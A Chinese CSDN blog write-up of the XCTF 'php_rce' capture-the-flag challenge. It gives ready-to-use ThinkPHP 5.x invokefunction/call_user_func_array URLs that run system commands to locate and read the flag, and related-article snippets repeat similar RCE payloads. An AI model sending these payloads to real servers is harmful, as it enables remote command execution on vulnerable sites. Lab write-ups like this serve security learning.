网络攻防路6-xctf php_rce

最新推荐文章于 2024-06-02 16:20:04 发布
最新推荐文章于 2024-06-02 16:20:04 发布
阅读量193 收藏
点赞数
分类专栏: 网络信息安全 文章标签: php 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u013896018/article/details/109700907
版权

目录

一 ,php_rce

二,解题

三 ,总结

一 ,php_rce

这事一道PHP远程代码执行漏洞题,RCE全称remote code execution,翻译成中文就是远程代码执行。是指用户通过浏览器提交执行命令,由于服务器端没有针对执行函数做过滤,导致在没有指定绝对路径的情况下就执行命令,可能会允许攻击者通过改变 $PATH 或程序执行环境的其他方面来执行一个恶意构造的代码。

二,解题

1 进入试题

2 访问http://220.249.52.133:38152/index.php/aaa

页面报错,说明存在漏洞

3 访问

http://220.249.52.133:38152/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=find%20/%20-name%20%22*flag*%22

4 访问/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat /flag

三 ,总结

网络攻防总是在过滤和反过滤中挣扎。

大紫明宫空离境
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
xctf_huaweicloud-qualifier-2020
05-31
xctf_huaweicloud-qualifier-2020写上去译文原始码类别名称网址分数解决了PWN cp 游戏 快速执行 Fastga mysqli 迷你人 nday_container_escape qemu-zzz 网络隐藏云我的1 我的2 派尔 网壳 :cross_mark: 杂项以太网 谁...
竞赛资料源码-XCTF联赛杭州(杭电)站选拔赛,动画效果图.zip
01-24
RoboMaster、RoboCon、“西门子杯”中国智能制造挑战赛、中国大学生计算机设计大赛、世界技能大赛、中国高校计算机大赛-大数据挑战赛、团体程序设计天梯赛、移动应用创新赛、网络技术挑战赛、全国大学生信息安全竞赛...
XCTF php_rce
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
03-31 592
ThinkPHP 5.X远程命令执行漏洞 利用system函数远程命令执行 ?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami 写入shell ?s=/index/\think\app/invokefunction&funct...
16、XCTF php_rce
山兔的博客
09-18 221
一打开网站,发现是thinkphp的cms框架。 看题目,暗示的很明显了。 命令执行漏洞 上dirsearch,跑一下 200 - 1KB - /favicon.ico 200 - 931B - /index.php 200 - 24B - /robots.txt 301 - 328B - /static -> http://111.200.241.244:63456/static/ 跑出来了。去验证了一下, User-agent: * Disallow: 没发现什么有用的
攻防世界XCTF:php_rce
末初的CSDN博客
03-13 3626
漏洞预警: https://help.aliyun.com/noticelist/articleid/1000081331.html?spm=5176.2020520001.1004.7.2e874bd363uLuf 漏洞描述: 由于ThinkPHP5框架对控制器名没有进行足够的安全检测,导致在没有开启强制由的情况下,黑客构造特定的请求,可直接GetWebShell。 影响版本: Think...
XCTF WEB 高手进阶区 php_rce
qq_30076719的博客
11-04 268
这一题,看到rec,第一时间想到命令执行,打开链接, 提示ThinkPHP V5 ,V5就是第五个版本啦,据百度所知,ThinkPHP是一款国内流行的开源PHP框架,2018年被爆出存在可能的远程代码执行漏洞,受影响的版本包括5.0和5.1版本,那么很合理啦,这一题考的就是这个漏洞的利用,百度可得poc s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=
XCTF中高阶web的php_rce
帅醉了的博客
03-14 208
payload为 /?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php%20-r%20%27system("cat%20../../../flag");%27 解析: 1.当$name以反斜线开始时会直接将其作为类的命名空间径。 2....
XCTF_A_物料清单标准功能培训.pptx
10-11
XCTF_A_物料清单标准功能培训.pptx
XCTF_A_应收管理标准功能培训.pptx
10-11
XCTF_A_应收管理标准功能培训.pptx
XCTF_A_应付管理标准功能培训.pptx
10-11
XCTF_A_应付管理标准功能培训.pptx
攻防世界 XCTF】 WEB 高手进阶 php_rce ——最全面、最直观的WP
algae
05-04 682
攻防世界web高手进阶php_rce,php_rce 攻防世界xctf web
weixin_39603613的博客
03-09 246
php_rce首先了解ThinkPHP5.x rec 漏洞分析与复现https://blog.csdn.net/qq_40884727/article/details/101452478var_pathinfo的默认配置为s,我们可以通过$_GET[‘s’]来传参于是构造payloadhttp://111.198.29.45:30600/index.php?s=index/\think\App/i...
攻防世界web高手进阶php_rce,[CTF]攻防世界web高手进阶区Writeup(更行ing)
weixin_42531396的博客
03-09 142
baby_webEMMMM,这就是一个签到题~解题方法:F12→Networks→刷新抓包→完成Training-WWW-Robots看题目可以知道这道题考的是爬虫协议(robots.txt文件)的知识打开网页,果然~他在网页里还暗示了一下,Sometimes these files reveal the directory structure instead protecting the con...
linux 阿里云服务器安装ImageMagick和php扩展imagick
qq_54039576的博客
05-27 363
我的服务器默认是php.7.4.3 , 改完php -m 是找不到imagick的,实际上没对应php版本解锁,Alibaba Cloud Linux 3.2104 LTS 64位。就所有php.ini全改一遍, 再重启一遍apache和数据库。#寻找所有php.ini文件。
Steamdeck使用Windows系统游玩雪地奔驰时闪退问题解决方法
fxalll的博客
05-28 430
在github正好有一个叫dxvk的库,能够基于vulkan实现d3d11,因此我们访问https://github.com/doitsujin/dxvk,从 Releases下载dxvk-2.3.1.tar.gz(当前最新版本),解压压缩包,在x64 目录中获取 dxgi.dll 和 d3d11.dll,并将两个dll文件放进Snowrunner.exe根目录所在的位置,再次启动游戏,游戏果然正常运行了。因此我自己分析终于解决该问题。困扰我两天的问题终于解决了,也算这个小众游戏全网的第一个解决方案吧。
linnux上安装php zip(ZipArchive)、libzip扩展
科小洋的博客
05-29 476
安装顺序:安装zip(ZipArchive),需要先安装libzip扩展安装libzip,需要先安装cmake按照cmake、libzip、zip的先后顺序安装下面的命令都是Linux命令。
PbootCMS后台用户账号密码时进行重置工具
itfans123的博客
05-29 239
2)在浏览器直接访问访问该文件地址,然后按照页面提示输入相关信息进行重置,此处填写的“数据库配置文件”用于重置工具连接数据,如果没有做过特殊改动,一般默认即可,然后输入要重置的账号和新密码,重置后一定要记得删除该工具,切记!1)下载重置工具解压包,解压后将resetpw.php文件直接上传到网站根目录下;使用完之后一定要删除resetpw.php文件!工具用于忘记PbootCMS后台用户账号密码时进行重置。
文件包含漏洞
最新发布
大河之犬的博客
06-02 372
当用户以某种方式控制即将由服务器加载的文件时,就会出现漏洞。远程文件包含(RFI): 从远程服务器加载文件。在php中,默认情况下禁用此功能(本地文件包含(LFI): 服务器加载本地文件PHP 过滤器允许在数据被读取或写入之前执行基本的修改操作。有 5 类过滤器:1、字符串过滤器string.strip_tags: 从数据中删除标签(位于 “” 字符之间的所有内容)2、转换过滤器:转换为不同的编码(iconv -l滥用。
pure_color xctf
07-16
pure_color xctf 提供了逼真的仿真环境,使得参赛者能够在一个安全的网络环境下进行实时的攻防演练。平台上的题目多样化且具有挑战性,旨在让参赛者将所学的理论知识应用到实际场景中去,并培养解决问题和团队合作的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值